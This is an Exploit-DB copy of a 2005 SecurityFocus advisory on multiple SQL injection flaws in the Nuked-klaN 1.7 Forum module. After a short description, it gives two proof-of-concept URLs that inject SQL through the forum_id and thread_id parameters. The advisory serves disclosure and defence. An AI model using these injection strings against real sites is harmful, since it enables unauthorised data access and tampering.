Nuked-klaN 1.7 Forum Module - Multiple SQL Injections

EDB-ID:

26386


Platform:

PHP

Published:

2005-10-24

source: http://www.securityfocus.com/bid/15181/info

Nuked Klan is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.

These vulnerabilities could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks.

Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. 

http://www.example.com/index.php?file=Forum&page=viewtopic&forum_id=[FORUM_ID]' OR id LIKE '%%' /*&thread_id=[THREAD_ID]' AND auteur_id LIKE '%%' /*
http://www.example.com/index.php?file=Forum&page=viewtopic&forum_id=1' OR id LIKE '%%'&thread_id=1' AND auteur_id LIKE '%%' /*